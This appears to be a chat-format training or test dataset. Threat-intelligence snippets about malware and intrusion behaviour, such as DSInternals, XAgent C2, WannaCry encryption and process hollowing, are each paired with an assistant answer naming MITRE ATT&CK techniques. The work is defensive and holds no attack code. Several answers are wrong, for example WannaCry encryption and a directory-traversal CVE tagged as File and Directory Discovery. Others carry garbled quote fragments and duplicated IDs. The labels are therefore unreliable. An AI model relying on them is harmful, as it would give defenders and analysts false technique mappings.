- "content": "A tool used by the adversary which wasn’t installed on the servers by default, was DSInternals. DSInternals is a PowerShell module that makes use of internal Active Directory features. The files and directories found on various systems of a victim match with DSInternals version 2.16.1. We have found traces that indicate DSInternals was executed and at which time, which match with the rest of the traces of the intrusion. We haven’t recovered traces of how the adversary used DSInternals, but considering the phase of the intrusion the adversary used the tool, it is likely they used it for either account discovery or privilege escalation, or both"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Downloader After the exploit or script executes, the system downloads install.exe, which has the following metadata: MD5 5a0c4e1925c76a959ab0588f683ab437 Size 46592 bytes Compile Time 2014-11-19 08:55:10Z Import Hash 6b8611f8148a6b51e37fd68e75b6a81c The file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path “C:\\Users\\Public”, which fails on Windows XP because that path is not present by default"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exfiltrated files stolen from local systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once a removable media device is inserted back into the first victim, collects data from it that was exfiltrated from a second victim."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Screenshot in leak of administrative panel for an account at DeltaHost If we use the filename of this screenshot and assume that it was taken on March 29, 2019 and subtract 194 days from this date, it is possible that this server had been operational since at least September 16, 2018"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When generating the URL for the HTTP requests issued to the C2 server, the Trojan chooses a random folder from the following to include within the URL path: watch/? search/? find/? results/? open/? search/? close/? XAgent also will choose several parameters names from the following list when finishing the construction of the C2 URL: itwm= text= from="
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HALFBAKED can obtain information about running processes on the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can run as a service using svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used various tools to download files, including DGet (a similar tool to wget)."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:// protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user’s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups"
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1555 - Credentials from Password Stores', 'T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has deployed privileged containers that mount the filesystem of victim machine."
- },
- {
- "role": "assistant",
- "content": "T1611 - Escape to Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors compromise a website used by their target demographic (e.g., compromising a website specializing in oil and gas industry news when targeting the energy vertical)"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz can overwrite Registry settings to reduce its visibility on the victim."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This presentation by Christopher Glyer and Devon Kerr contains additional information on attacker use of WMI in past Mandiant investigations"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used PsExec to deploy beacons on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to list processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BACKSPACE uses HTTP as a transport to communicate with its command server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook is capable of taking an image of and uploading the current desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CVE-2014-4113 is a privilege escalation vulnerability that was disclosed publicly on 2014-10-14"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses PowerShell to add a Registry Run key in order to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet has the ability to obtain a victim's system name and operating system version."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the Trojan runs as an executable within the \"DsvHelper\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. The embedded payload written to process memory exists in the \"R\" resource and called function in the new payload is named \"RPe.Test.Work\". The function will take another executable embedded in the initial Trojan as a resource named \"M\", which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex has used code signing certificates issued to fake companies to bypass security controls."
- },
- {
- "role": "assistant",
- "content": "T1588.003 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec is capable of using HTTP and HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon can use a dynamic Windows hashing algorithm to map API components."
- },
- {
- "role": "assistant",
- "content": "T1027.007 - Obfuscated Files or Information: Dynamic API Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dacls can scan directories on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy is a group that primarily targets diplomatic organizations in the Middle East and Africa, and less frequently, telecommunication companies. Their initial attack methodology is focused on exploiting vulnerable internet-exposed applications on webservers, in order to drop and execute a webshell. Post compromise, via the webshell, BackdoorDiplomacy deploys open-source software for reconnaissance and information gathering, and favors the use of DLL search order hijacking to install its backdoor, Turian. Finally, BackdoorDiplomacy employs a separate executable to detect removable media, likely USB flash drives, and copy their contents to the main drive’s recycle bin"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Explosive has collected the computer name from the infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon has dumped account hashes with Carbanak and cracked them with Cain & Abel."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD also dabbled with a short-lived, fileless version of their malware when it obtained an exploit for a Flash vulnerability (CVE-2015-5119) that was leaked during the Hacking Team breach"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Among the different files dropped by the latest versions of Ramsay we find a Spreader component. This executable will attempt to scan for network shares and removable drives excluding A: and B: drives"
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. 's backdoor also enables remote attackers to modify and delete subkeys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. has also used WMIC during and post compromise cleanup activities."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec can obtain the OS version information, computer name, processor architecture, machine role, and OS edition."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information. The tool runs the following list of WMI queries"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can’t be directly decoded with Base64 decoding"
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Looking into the arguments shows that the process plugin comes from the received packet to execute functions such as collecting process information, running a new process, and terminating a running one. The process information collected includes the username, user ID, group ID, and process parent ID of the target process"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore uses VBS files."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used batch scripts in its malware to install persistence mechanisms."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint can uninstall the malicious service from an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1070.009 - Clear Persistence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has executed JavaScript scriptlets on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RGDoor executes the \"whoami\" on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the malware executes the extracted install.bat script before deleting the original files and exiting"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 kills and disables services for Windows Security Center, and Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron can be configured to exfiltrate data during nighttime or working hours."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used obfuscated PowerShell scripts for staging."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon contains base64-encoded strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The files are encrypted with a randomly generated 128-bit AES key in CBC mode with a NULL initialization vector. The key is generated per file, is encrypted with the generated RSA public key, and included in the encrypted file header. Each file encrypted by the malware starts with the string WANACRY. and has the WNCRY extension. Depending on the file properties, the malware may also stage files in a WNCRYT extension"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sifo – Collect victim system information - drive – List drives on victim machine - list – List file information for provided directory - upload – Upload a file to the victim machine - open – Spawn a command shell"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer', 'T1082 - System Information Discovery', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After moving through the network and identifying assets to target, the next step would be to gather key data. At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware)."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses and other Active Directory utilities to enumerate hosts."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, this Trojan checks to see if it was configured with “BINDERON” to determine if it should extract an embedded payload from a resource named “B”, save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper can decompress and copy driver files using `LZCopy`."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware names itself \"svchost.exe,\" which is the name of the Windows shared service host program."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIVEHANDS uses an embedded NTRU public key. This NTRU key is SHA512 hashed and the first 32 bytes are used as the victim ID within the ransom note. This NTRU pubic key is also used to encrypt each file's symmetric key. For the symmetric key, FIVEHANDS uses an embedded generation routine to produce 16 random bytes used for an AES key to encrypt each file. After each file is encrypted, the original file size, magic value of DE C0 AD BA, and AES key are encrypted with the public NTRU key and appended to the file. The four magic bytes DB DC CC AB are appended to the end of the encrypted file. FIVEHANDS includes additional code not found in DEATHRANSOM and HELLOKITTY to use the Windows Restart Manager to close a file currently in use so that it can be unlocked and successfully encrypted"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon can download an executable to run on the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file."
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has used base64 encoding to hide command strings delivered from the C2."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "macOS.OSAMiner has used `ps ax | grep | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a keylogger component."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors used the following commands following exploitation of a machine with malware to enumerate user accounts: net user >> %temp%\\download net user /domain >> %temp%\\download"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used batch scripts and scheduled tasks to delete critical system files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
